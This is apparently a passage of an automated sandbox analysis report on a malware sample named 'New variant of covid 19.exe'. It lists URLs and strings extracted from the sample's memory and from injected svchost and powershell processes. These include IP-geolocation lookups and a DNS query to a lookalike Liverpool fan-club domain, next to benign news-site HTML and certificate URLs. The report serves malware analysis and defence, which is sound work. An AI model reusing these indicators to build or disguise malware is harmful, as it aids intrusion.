data-link-tracking="Header|SectionLabel|Text|Schedule" href="https://www.liverpool.com/schedule/">Schedule</a><ul data-level="2"><li><a data-link-tracking="Header|DropDown|Text|Premier League" href="https://www.liverpool.com/all-about/premier-league">Premier League</a></li></ul><a class="icon toggle" href="#">Expand</a></li><li><a data-link-tracking="Header|SectionLabel|Text|Features" href="https://www.liverpool.com/liverpool-fc-news/features/">Features</a></li></ul></section></nav><profile-icon lr-custom-id="signin" lr-custom-class="header-profile-icon" lr-gtm-label="header" lr-show-account-link></profile-icon><div class="search"><button class="icon icon-search" id="search-icon" type="button" aria-label="Search"></button></div><div class="search-box hidden"><gcse:searchbox-only resultsUrl="https://www.liverpool.com/search/"></gcse:searchbox-only></div><div class="social-sites"><ul><li class="follow hidden"><span class="follow-text publication-theme">Follow us</span></li><li><a class="icon facebook" title="facebook" href="https://www.facebook.com/liverpooldotcom" target="_blank" data-provider="facebook" data-tracking="facebook|follow|top"></a></li><li><a class="icon twitter" title="twitter" href="https://twitter.com/liverpoolcom_" target="_blank" data-provider="twitter" data-tracking="twitter|follow|top"></a></li></ul></div></div><nav class="secondary" data-smooth-scroll><section><ul class="click-track" data-level="1"><li><a href="https://www.liverpool.com/about-us/">About Us</a></li><li><a href="https://www.liverpool.com/contact-us/">Contact Us</a></li><li><a href="https://www.liverpool.com/advertising/">Advertise with us</a></li></ul></section></nav><nav class="footer"><section><ul data-level="1"><li><a href="https://www.liverpool.com/about-us/">About Us</a></li><li><a href="https://www.liverpool.com/contact-us/">Contact Us</a></li><li><a href="https://www.liverpool.com/rss-feeds/">RSS Feeds</a></li><li><a href="https://www.liverpool.com/terms-conditions/">T&amp;Cs</a></li><li><a href="https://www.liverpool.com/cookie-policy/">Cookie Policy</a></li><li><a href="https://www.liverpool.com/r
      Source: New variant of covid 19.exe, 00000000.00000003.202267041.000000000421A000.00000004.00000001.sdmp, svchost.exe, 00000011.00000003.265515884.000000000393A000.00000004.00000001.sdmp, svchost.exe, 00000015.00000003.303084080.0000000003D9A000.00000004.00000001.sdmpString found in binary or memory: <header class="mod-header" data-mod="header" data-immediate><div class="primary publication-theme-highlight"><a data-link-tracking="Header|MainLogo|Image|liverpool" id="logo" href="/">liverpool</a><a class="icon" id="hamburger" href="#">Load mobile navigation<span></span></a><nav class="primary"><section><ul data-level="1"><li class="has-children"><a data-link-tracking="Header|SectionLabel|Text|Liverpool FC News" href="https://www.liverpool.com/liverpool-fc-news/">Liverpool FC News</a><ul data-level="2"><li><a data-link-tracking="Header|DropDown|Text|Latest News" href="https://www.liverpool.com/liverpool-fc-news/">Latest News</a></li><li><a data-link-tracking="Header|DropDown|Text|Transfer News" href="https://www.liverpool.com/liverpool-fc-news/transfer-news/">Transfer News</a></li></ul><a class="icon toggle" href="#">Expand</a></li><li class="has-children"><a data-link-tracking="Header|SectionLabel|Text|Schedule" href="https://www.liverpool.com/schedule/">Schedule</a><ul data-level="2"><li><a data-link-tracking="Header|DropDown|Text|Premier League" href="https://www.liverpool.com/all-about/premier-league">Premier League</a></li></ul><a class="icon toggle" href="#">Expand</a></li><li><a data-link-tracking="Header|SectionLabel|Text|Features" href="https://www.liverpool.com/liverpool-fc-news/features/">Features</a></li></ul></section></nav><profile-icon lr-custom-id="signin" lr-custom-class="header-profile-icon" lr-gtm-label="header" lr-show-account-link></profile-icon><div class="search"><button class="icon icon-search" id="search-icon" type="button" aria-label="Search"></button></div><div class="search-box hidden"><gcse:searchbox-only resultsUrl="https://www.liverpool.com/search/"></gcse:searchbox-only></div><div class="social-sites"><ul><li class="follow hidden"><span class="follow-text publication-theme">Follow us</span></li><li><a class="icon facebook" title="facebook" href="https://www.facebook.com/liverpooldotcom" target="_blank" data-provider="facebook" data-tracking="facebook|follow|top"></a></li><li><a class="icon twitter" title="twitter" href="https://twitter.com/liverpoolcom_" target="_blank" data-provider="twitter" data-tracking="twitter|follow|top"></a></li></ul></div></div><nav class="secondary" data-smooth-scroll><section><ul class="click-track" data-level="1"><li><a href="https://www.liverpool.com/about-us/">About Us</a></li><li><a href="https://www.liverpool.com/contact-us/">Contact Us</a></li><li><a href="https://www.liverpool.com/advertising/">Advertise with us</a></li></ul></section></nav><nav class="footer"><section><ul data-level="1"><li><a href="https://www.liverpool.com/about-us/">About Us</a></li><li><a href="https://www.liverpool.com/contact-us/">Contact Us</a></li><li><a href="https://www.liverpool.com/rss-feeds/">RSS Feeds</a></li><li><a href="https://www.liverpool.com/terms-conditions/">T&amp;Cs</a></li><li><a href="https://www.liverpool.com/cookie-policy/">Cookie Policy</a></li><li><a href="https://www.liverpool.com/r
      Source: New variant of covid 19.exe, 00000000.00000003.202267041.000000000421A000.00000004.00000001.sdmp, svchost.exe, 00000011.00000003.265515884.000000000393A000.00000004.00000001.sdmp, svchost.exe, 00000015.00000003.303084080.0000000003D9A000.00000004.00000001.sdmpString found in binary or memory: <meta property="og:site_name" content="Liverpool.com"><meta property="og:language" content="en"><meta property="og:type" content="article"><meta property="og:title" content="The Brewster Experience has underdelivered so far, but that will change"><meta property="og:url" content="https://www.liverpool.com/liverpool-fc-news/features/rhian-brewster-liverpool-arsenal-team-17172763"><meta property="og:description" content="Rhian Brewster was hyped up before the start of the season, but was that fair?"><meta property="og:image" content="https://i2-prod.liverpoolecho.co.uk/incoming/article17172788.ece/ALTERNATES/s1200/1_GettyImages-1178657262.jpg"><meta property="og:section" content="Features"><meta property="article:tag" content="Rhian Brewster"><meta property="article:author" content="https://www.facebook.com/kristianwalsh1987/"><meta property="article:published_time" content="2019-10-30T16:00:00Z"><meta property="article:modified_time" content="2019-10-30T15:36:53Z"><meta property="article:expiration_time" content="2019-11-29T15:36:53Z"><meta property="article:section" content="Features"><meta property="article:id" content="liverpool-17172763"> equals www.facebook.com (Facebook)
      Source: svchost.exe, 00000015.00000003.303084080.0000000003D9A000.00000004.00000001.sdmpString found in binary or memory: n, Gomez/Lovren, James Milner, Oxlade-Chamberlain, Naby Keita and Divock Origi. An impressive outing against Arsenal could nudge him ahead of Adam Lallana, or even Harvey Elliott, in the fight for that seventh spot.</p> <p>The world is still expected to be at Brewster&apos;s feet at Liverpool. It is just a matter of waiting for him to be passed it.</p><!-- Article End--></div><div id="social-follow" data-mod="socialFollow"><div id="social-methods"><div class="facebook-share"><span class="icon facebook large"></span><div class="fb-like" data-href="https://www.facebook.com/liverpooldotcom" data-layout="button_count" data-action="like" data-size="large" data-width="300" data-show-faces="false" data-share="false"></div><span class="page-name">liverpooldotcom</span></div><div class="twitter-share" data-follow-url="https://twitter.com/intent/follow?screen_name=liverpoolcom_"><span class="icon twitter large"></span><a>Follow @<span>liverpoolcom_</span></a></div></div></div><div class="tag-list"><span class="publication-theme-border publication-theme-icon">More On</span><ul><li><a class="publication-theme-button-highlight" href="https://www.liverpool.com/all-about/rhian-brewster" data-link-tracking="EndArticle|Tag">Rhian Brewster</a></li></ul></div></div><aside class="related-column secondary"></aside></div></article> equals www.facebook.com (Facebook)
      Source: svchost.exe, 00000015.00000003.303084080.0000000003D9A000.00000004.00000001.sdmpString found in binary or memory: n, Gomez/Lovren, James Milner, Oxlade-Chamberlain, Naby Keita and Divock Origi. An impressive outing against Arsenal could nudge him ahead of Adam Lallana, or even Harvey Elliott, in the fight for that seventh spot.</p> <p>The world is still expected to be at Brewster&apos;s feet at Liverpool. It is just a matter of waiting for him to be passed it.</p><!-- Article End--></div><div id="social-follow" data-mod="socialFollow"><div id="social-methods"><div class="facebook-share"><span class="icon facebook large"></span><div class="fb-like" data-href="https://www.facebook.com/liverpooldotcom" data-layout="button_count" data-action="like" data-size="large" data-width="300" data-show-faces="false" data-share="false"></div><span class="page-name">liverpooldotcom</span></div><div class="twitter-share" data-follow-url="https://twitter.com/intent/follow?screen_name=liverpoolcom_"><span class="icon twitter large"></span><a>Follow @<span>liverpoolcom_</span></a></div></div></div><div class="tag-list"><span class="publication-theme-border publication-theme-icon">More On</span><ul><li><a class="publication-theme-button-highlight" href="https://www.liverpool.com/all-about/rhian-brewster" data-link-tracking="EndArticle|Tag">Rhian Brewster</a></li></ul></div></div><aside class="related-column secondary"></aside></div></article> equals www.twitter.com (Twitter)
      Source: unknownDNS traffic detected: queries for: liverpoolofcfanclub.com
      Source: New variant of covid 19.exe, 0000000A.00000002.737784433.0000000000402000.00000040.00000001.sdmpString found in binary or memory: http://api.ipify.org/
      Source: svchost.exe, 00000015.00000003.277937021.0000000000E86000.00000004.00000001.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
      Source: svchost.exe, 00000015.00000003.277937021.0000000000E86000.00000004.00000001.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
      Source: powershell.exe, 00000005.00000002.312490657.0000000002ED5000.00000004.00000020.sdmp, svchost.exe, 00000015.00000003.281468526.0000000000E69000.00000004.00000001.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
      Source: svchost.exe, 00000015.00000003.277937021.0000000000E86000.00000004.00000001.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
      Source: svchost.exe, 00000012.00000003.600569565.00000213EECA1000.00000004.00000001.sdmpString found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0
      Source: svchost.exe, 00000015.00000003.277937021.0000000000E86000.00000004.00000001.sdmpString found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
      Source: svchost.exe, 00000015.00000003.277937021.0000000000E86000.00000004.00000001.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
      Source: svchost.exe, 00000015.00000003.277937021.0000000000E86000.00000004.00000001.sdmpString found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
      Source: New variant of covid 19.exe, 00000000.00000003.196942702.00000000059C2000.00000004.00000001.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/
      Source: New variant of covid 19.exe, 00000000.00000003.197794290.00000000017B3000.00000004.00000001.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdE
      Source: New variant of covid 19.exe, 00000000.00000003.197444758.000000000598F000.00000004.00000001.sdmp, New variant of covid 19.exe, 00000000.00000003.196942702.00000000059C2000.00000004.00000001.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
      Source: New variant of covid 19.exe, 00000000.00000003.196929354.00000000017B3000.00000004.00000001.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab?4b6f634dedba6
      Source: New variant of covid 19.exe, 0000000A.00000002.737784433.0000000000402000.00000040.00000001.sdmpString found in binary or memory: http://freegeoip.net/xml/
      Source: New variant of covid 19.exe, 0000000A.00000002.744575828.0000000002F31000.00000004.00000001.sdmpString found in binary or memory: http://ip-api.com
      Source: New variant of covid 19.exe, 0000000A.00000002.737784433.0000000000402000.00000040.00000001.sdmp, New variant of covid 19.exe, 0000000A.00000002.744575828.0000000002F31000.00000004.00000001.sdmpString found in binary or memory: http://ip-api.com/json/
      Source: svchost.exe, 00000012.00000003.600569565.00000213EECA1000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.digicert.com0:
      Source: svchost.exe, 00000015.00000003.277937021.0000000000E86000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.digicert.com0C
      Source: svchost.exe, 00000015.00000003.277937021.0000000000E86000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.digicert.com0O
      Source: svchost.exe, 00000012.00000002.601903948.00000213F4400000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.msocsp.com0
      Source: New variant of covid 19.exe, 00000000.00000003.202267041.000000000421A000.00000004.00000001.sdmp, svchost.exe, 00000011.00000003.265515884.000000000393A000.00000004.00000001.sdmp, svchost.exe, 00000015.00000003.303084080.0000000003D9A000.00000004.00000001.sdmpString found in binary or memory: http://schema.org/BreadcrumbList
      Source: svchost.exe, 00000015.00000003.303084080.0000000003D9A000.00000004.00000001.sdmpString found in binary or memory: http://schema.org/ListItem
      Source: New variant of covid 19.exe, 00000000.00000003.202267041.000000000421A000.00000004.00000001.sdmp, svchost.exe, 00000011.00000003.265515884.000000000393A000.00000004.00000001.sdmp, svchost.exe, 00000015.00000003.303084080.0000000003D9A000.00000004.00000001.sdmpString found in binary or memory: http://schema.org/NewsArticle
      Source: New variant of covid 19.exe, 0000000A.00000002.744882535.0000000002F6A000.00000004.00000001.sdmpString found in binary or memory: http://schemas.datacontract.org/2004/07/
      Source: powershell.exe, 00000022.00000002.413593519.0000000004CB2000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
      Source: New variant of covid 19.exe, 0000000A.00000002.744575828.0000000002F31000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
      Source: powershell.exe, 00000022.00000002.413593519.0000000004CB2000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
      Source: svchost.exe, 0000001B.00000002.311005148.0000022377213000.00000004.00000001.sdmpString found in binary or memory: http://www.bingmapsportal.com
      Source: svchost.exe, 00000015.00000003.277937021.0000000000E86000.00000004.00000001.sdmpString found in binary or memory: http://www.digicert.com/CPS0
      Source: svchost.exe, 00000018.00000002.739177943.0000017126845000.00000004.00000001.sdmpString found in binary or memory: https://%s.dnet.xboxlive.com
      Source: svchost.exe, 00000018.00000002.739177943.0000017126845000.00000004.00000001.sdmpString found in binary or memory: https://%s.xboxlive.com
      Source: svchost.exe, 00000018.00000002.739177943.0000017126845000.00000004.00000001.sdmpString found in binary or memory: https://activity.windows.com
      Source: New variant of covid 19.exe, 00000000.00000003.202267041.000000000421A000.00000004.00000001.sdmp, svchost.exe, 00000011.00000003.265515884.000000000393A000.00000004.00000001.sdmp, svchost.exe, 00000015.00000003.303084080.0000000003D9A000.00000004.00000001.sdmpString found in binary or memory: https://ads.pubmatic.com/AdServer/js/pwt/156997/3236/pwt.js
      Source: svchost.exe, 0000001B.00000003.309958248.0000022377260000.00000004.00000001.sdmpString found in binary or memory: https://appexmapsappupdate.blob.core.windows.net
      Source: svchost.exe, 00000018.00000002.739113278.000001712682A000.00000004.00000001.sdmpString found in binary or memory: https://bn2.notify.windows.com/v2/register/xplatform/device
      Source: New variant of covid 19.exe, 00000000.00000003.202267041.000000000421A000.00000004.00000001.sdmp, svchost.exe, 00000011.00000003.265515884.000000000393A000.00000004.00000001.sdmp, svchost.exe, 00000015.00000003.303084080.0000000003D9A000.00000004.00000001.sdmpString found in binary or memory: https://c.amazon-adsystem.com/aax2/apstag.js
      Source: svchost.exe, 00000018.00000002.739113278.000001712682A000.00000004.00000001.sdmpString found in binary or memory: https://co4-df.notify.windows.com/v2/register/xplatform/device
      Source: svchost.exe, 0000001B.00000003.310012576.0000022377249000.00000004.00000001.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/Imagery/Copyright/
      Source: svchost.exe, 0000001B.00000003.309958248.0000022377260000.00000004.00000001.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/Locations
      Source: svchost.exe, 0000001B.00000002.311128902.000002237723D000.00000004.00000001.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/Routes/
      Source: svchost.exe, 0000001B.00000003.309958248.0000022377260000.00000004.00000001.sdmpString found in binary or memory: https://dev.ditu.live.com/mapcontrol/logging.ashx
      Source: svchost.exe, 0000001B.00000003.309882014.000002237724E000.00000004.00000001.sdmpString found in binary or memory: https://dev.ditu.live.com/mapcontrol/mapconfiguration.ashx?name=native&v=
      Source: svchost.exe, 0000001B.00000003.287773862.0000022377231000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Locations
      Source: svchost.exe, 0000001B.00000002.311128902.000002237723D000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/
      Source: svchost.exe, 0000001B.00000003.309958248.0000022377260000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Driving
      Source: svchost.exe, 0000001B.00000003.309958248.0000022377260000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Transit
      Source: svchost.exe, 0000001B.00000003.309958248.0000022377260000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Walking
      Source: svchost.exe, 0000001B.00000002.311156508.0000022377242000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Transit/Schedules/
      Source: svchost.exe, 0000001B.00000002.311156508.0000022377242000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/mapcontrol/HumanScaleServices/GetBubbles.ashx?n=
      Source: svchost.exe, 0000001B.00000003.309958248.0000022377260000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/mapcontrol/logging.ashx
      Source: svchost.exe, 0000001B.00000002.311281205.000002237725C000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/webservices/v1/LoggingService/LoggingService.svc/Log?
      Source: svchost.exe, 0000001B.00000003.310012576.0000022377249000.00000004.00000001.sdmpString found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gd?pv=1&r=
      Source: svchost.exe, 0000001B.00000002.311281205.000002237725C000.00000004.00000001.sdmpString found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gdi?pv=1&r=
      Source: svchost.exe, 0000001B.00000002.311281205.000002237725C000.00000004.00000001.sdmpString found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gdv?pv=1&r=
      Source: svchost.exe, 0000001B.00000003.310012576.0000022377249000.00000004.00000001.sdmpString found in binary or memory: https://dynamic.t
      Source: svchost.exe, 0000001B.00000003.309958248.0000022377260000.00000004.00000001.sdmpString found in binary or memory: https://dynamic.t0.tiles.ditu.live.com/comp/gen.ashx
      Source: svchost.exe, 0000001B.00000002.311128902.000002237723D000.00000004.00000001.sdmpString found in binary or memory: https://ecn.dev.virtualearth.net/REST/v1/Imagery/Copyright/
      Source: svchost.exe, 0000001B.00000003.287773862.0000022377231000.00000004.00000001.sdmpString found in binary or memory: https://ecn.dev.virtualearth.net/mapcontrol/mapconfiguration.ashx?name=native&v=
      Source: svchost.exe, 00000011.00000003.281475012.000000000393A000.00000004.00000001.sdmpString found in binary or memory: https://felix.data.tm-awx.com
      Source: New variant of covid 19.exe, 00000000.00000003.202267041.000000000421A000.00000004.00000001.sdmp, svchost.exe, 00000011.00000003.265515884.000000000393A000.00000004.00000001.sdmp, svchost.exe, 00000015.00000003.303084080.0000000003D9A000.00000004.00000001.sdmpString found in binary or memory: https://felix.data.tm-awx.com/ampconfig.json&quot;
      Source: New variant of covid 19.exe, 00000000.00000003.202267041.000000000421A000.00000004.00000001.sdmp, svchost.exe, 00000011.00000003.265515884.000000000393A000.00000004.00000001.sdmp, svchost.exe, 00000015.00000003.303084080.0000000003D9A000.00000004.00000001.sdmpString found in binary or memory: https://felix.data.tm-awx.com/felix.min.js
      Source: New variant of covid 19.exe, 00000000.00000003.207848034.000000000421A000.00000004.00000001.sdmp, svchost.exe, 00000011.00000003.281475012.000000000393A000.00000004.00000001.sdmpString found in binary or memory: https://github.com/ded/script.js
      Source: svchost.exe, 00000011.00000003.281475012.000000000393A000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com
      Source: svchost.exe, 00000015.00000003.303084080.0000000003D9A000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article17156435.ece/ALTERNATES/s615/1_GettyImages-1183794835.
      Source: svchost.exe, 00000015.00000003.303084080.0000000003D9A000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article17166876.ece/ALTERNATES/s615/0_GettyImages-1175998874.
      Source: New variant of covid 19.exe, 00000000.00000003.202267041.000000000421A000.00000004.00000001.sdmp, svchost.exe, 00000011.00000003.265515884.000000000393A000.00000004.00000001.sdmp, svchost.exe, 00000015.00000003.303084080.0000000003D9A000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19936064.ece/ALTERNATES/s180/0_WhatsApp-Image-2021-02-
      Source: New variant of covid 19.exe, 00000000.00000003.202267041.000000000421A000.00000004.00000001.sdmp, svchost.exe, 00000011.00000003.265515884.000000000393A000.00000004.00000001.sdmp, svchost.exe, 00000015.00000003.303084080.0000000003D9A000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19936064.ece/ALTERNATES/s220b/0_WhatsApp-Image-2021-02
      Source: New variant of covid 19.exe, 00000000.00000003.202267041.000000000421A000.00000004.00000001.sdmp, svchost.exe, 00000011.00000003.265515884.000000000393A000.00000004.00000001.sdmp, svchost.exe, 00000015.00000003.303084080.0000000003D9A000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19936064.ece/ALTERNATES/s270b/0_WhatsApp-Image-2021-02
      Source: New variant of covid 19.exe, 00000000.00000003.202267041.000000000421A000.00000004.00000001.sdmp, svchost.exe, 00000011.00000003.265515884.000000000393A000.00000004.00000001.sdmp, svchost.exe, 00000015.00000003.303084080.0000000003D9A000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19936064.ece/ALTERNATES/s615/0_WhatsApp-Image-2021-02-
      Source: New variant of covid 19.exe, 00000000.00000003.202267041.000000000421A000.00000004.00000001.sdmp, svchost.exe, 00000011.00000003.265515884.000000000393A000.00000004.00000001.sdmp, svchost.exe, 00000015.00000003.303084080.0000000003D9A000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19938370.ece/ALTERNATES/s180/0_Salah-Pressing.jpg
      Source: New variant of covid 19.exe, 00000000.00000003.202267041.000000000421A000.00000004.00000001.sdmp, svchost.exe, 00000011.00000003.265515884.000000000393A000.00000004.00000001.sdmp, svchost.exe, 00000015.00000003.303084080.0000000003D9A000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19938370.ece/ALTERNATES/s220b/0_Salah-Pressing.jpg
      Source: New variant of covid 19.exe, 00000000.00000003.202267041.000000000421A000.00000004.00000001.sdmp, svchost.exe, 00000011.00000003.265515884.000000000393A000.00000004.00000001.sdmp, svchost.exe, 00000015.00000003.303084080.0000000003D9A000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19938370.ece/ALTERNATES/s270b/0_Salah-Pressing.jpg
      Source: New variant of covid 19.exe, 00000000.00000003.202267041.000000000421A000.00000004.00000001.sdmp, svchost.exe, 00000011.00000003.265515884.000000000393A000.00000004.00000001.sdmp, svchost.exe, 00000015.00000003.303084080.0000000003D9A000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19938370.ece/ALTERNATES/s615/0_Salah-Pressing.jpg
      Source: New variant of covid 19.exe, 00000000.00000003.202267041.000000000421A000.00000004.00000001.sdmp, svchost.exe, 00000011.00000003.265515884.000000000393A000.00000004.00000001.sdmp, svchost.exe, 00000015.00000003.303084080.0000000003D9A000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19940968.ece/ALTERNATES/s180/0_Curtis-10.png
      Source: New variant of covid 19.exe, 00000000.00000003.202267041.000000000421A000.00000004.00000001.sdmp, svchost.exe, 00000011.00000003.265515884.000000000393A000.00000004.00000001.sdmp, svchost.exe, 00000015.00000003.303084080.0000000003D9A000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19940968.ece/ALTERNATES/s220b/0_Curtis-10.png
      Source: New variant of covid 19.exe, 00000000.00000003.202267041.000000000421A000.00000004.00000001.sdmp, svchost.exe, 00000011.00000003.265515884.000000000393A000.00000004.00000001.sdmp, svchost.exe, 00000015.00000003.303084080.0000000003D9A000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19940968.ece/ALTERNATES/s270b/0_Curtis-10.png
      Source: New variant of covid 19.exe, 00000000.00000003.202267041.000000000421A000.00000004.00000001.sdmp, svchost.exe, 00000011.00000003.265515884.000000000393A000.00000004.00000001.sdmp, svchost.exe, 00000015.00000003.303084080.0000000003D9A000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19940968.ece/ALTERNATES/s615/0_Curtis-10.png
      Source: New variant of covid 19.exe, 00000000.00000003.202267041.000000000421A000.00000004.00000001.sdmp, svchost.exe, 00000011.00000003.265515884.000000000393A000.00000004.00000001.sdmp, svchost.exe, 00000015.00000003.303084080.0000000003D9A000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19945821.ece/ALTERNATES/s180/0_Salah-Goal-vs-Leeds.jpg
      Source: New variant of covid 19.exe, 00000000.00000003.202267041.000000000421A000.00000004.00000001.sdmp, svchost.exe, 00000011.00000003.265515884.000000000393A000.00000004.00000001.sdmp, svchost.exe, 00000015.00000003.303084080.0000000003D9A000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19945821.ece/ALTERNATES/s220b/0_Salah-Goal-vs-Leeds.jp
      Source: New variant of covid 19.exe, 00000000.00000003.202267041.000000000421A000.00000004.00000001.sdmp, svchost.exe, 00000011.00000003.265515884.000000000393A000.00000004.00000001.sdmp, svchost.exe, 00000015.00000003.303084080.0000000003D9A000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19945821.ece/ALTERNATES/s270b/0_Salah-Goal-vs-Leeds.jp
      Source: New variant of covid 19.exe, 00000000.00000003.202267041.000000000421A000.00000004.00000001.sdmp, svchost.exe, 00000011.00000003.265515884.000000000393A000.00000004.00000001.sdmp, svchost.exe, 00000015.00000003.303084080.0000000003D9A000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19945821.ece/ALTERNATES/s615/0_Salah-Goal-vs-Leeds.jpg
      Source: New variant of covid 19.exe, 00000000.00000003.202267041.000000000421A000.00000004.00000001.sdmp, svchost.exe, 00000011.00000003.265515884.000000000393A000.00000004.00000001.sdmp, svchost.exe, 00000015.00000003.303084080.0000000003D9A000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19946983.ece/ALTERNATES/s180/0_RobertsonCross1.jpg
      Source: New variant of covid 19.exe, 00000000.00000003.202267041.000000000421A000.00000004.00000001.sdmp, svchost.exe, 00000011.00000003.265515884.000000000393A000.00000004.00000001.sdmp, svchost.exe, 00000015.00000003.303084080.0000000003D9A000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19946983.ece/ALTERNATES/s220b/0_RobertsonCross1.jpg
      Source: New variant of covid 19.exe, 00000000.00000003.202267041.000000000421A000.00000004.00000001.sdmp, svchost.exe, 00000011.00000003.265515884.000000000393A000.00000004.00000001.sdmp, svchost.exe, 00000015.00000003.303084080.0000000003D9A000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19946983.ece/ALTERNATES/s270b/0_RobertsonCross1.jpg
      Source: New variant of covid 19.exe, 00000000.00000003.202267041.000000000421A000.00000004.00000001.sdmp, svchost.exe, 00000011.00000003.265515884.000000000393A000.00000004.00000001.sdmp, svchost.exe, 00000015.00000003.303084080.0000000003D9A000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19946983.ece/ALTERNATES/s615/0_RobertsonCross1.jpg
      Source: New variant of covid 19.exe, 00000000.00000003.202267041.000000000421A000.00000004.00000001.sdmp, svchost.exe, 00000011.00000003.265515884.000000000393A000.00000004.00000001.sdmp, svchost.exe, 00000015.00000003.303084080.0000000003D9A000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19955390.ece/ALTERNATES/s180/0_GettyImages-1231353837.
      Source: New variant of covid 19.exe, 00000000.00000003.202267041.000000000421A000.00000004.00000001.sdmp, svchost.exe, 00000011.00000003.265515884.000000000393A000.00000004.00000001.sdmp, svchost.exe, 00000015.00000003.303084080.0000000003D9A000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19955390.ece/ALTERNATES/s220b/0_GettyImages-1231353837
      Source: New variant of covid 19.exe, 00000000.00000003.202267041.000000000421A000.00000004.00000001.sdmp, svchost.exe, 00000011.00000003.265515884.000000000393A000.00000004.00000001.sdmp, svchost.exe, 00000015.00000003.303084080.0000000003D9A000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19955390.ece/ALTERNATES/s270b/0_GettyImages-1231353837
      Source: New variant of covid 19.exe, 00000000.00000003.202267041.000000000421A000.00000004.00000001.sdmp, svchost.exe, 00000011.00000003.265515884.000000000393A000.00000004.00000001.sdmp, svchost.exe, 00000015.00000003.303084080.0000000003D9A000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19955390.ece/ALTERNATES/s615/0_GettyImages-1231353837.
      Source: New variant of covid 19.exe, 00000000.00000003.202267041.000000000421A000.00000004.00000001.sdmp, svchost.exe, 00000011.00000003.265515884.000000000393A000.00000004.00000001.sdmp, svchost.exe, 00000015.00000003.303084080.0000000003D9A000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19955855.ece/ALTERNATES/s180/0_GettyImages-1304940818.
